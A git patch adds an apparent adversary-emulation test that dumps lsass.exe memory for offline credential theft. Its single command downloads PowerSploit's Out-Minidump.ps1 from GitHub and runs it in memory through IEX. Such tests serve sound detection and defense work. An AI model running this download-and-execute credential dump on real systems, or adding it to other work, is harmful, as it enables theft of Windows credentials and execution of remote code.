From 030040bf73eb7bcb09b863af45b567e34ef0236c Mon Sep 17 00:00:00 2001
From: JimmyAstle <JimmyAstle@users.noreply.github.com>
Date: Wed, 13 Jan 2021 14:11:12 -0500
Subject: [PATCH] Out minidump (#1368)

* Adding a test of Out-Minidump.ps1

Adding in a credential dumping test that leverages Out-Minidump.ps1 to dump the contents of lsass to disk for offline extraction

* Fixing cleanup path

Path is actually %TEMP%

Co-authored-by: jimmy astle <jastle@vmware.com>
---
 atomics/T1003.001/T1003.001.yaml | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 22aacb82..f4f6e00a 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -233,3 +233,17 @@ atomic_tests:
       pypykatz live lsa
     name: command_prompt
     elevation_required: true
+- name: Dump LSASS.exe Memory using Out-Minidump.ps1
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
+    powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
+    Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+       IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
+    cleanup_command: |
+      Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
\ No newline at end of file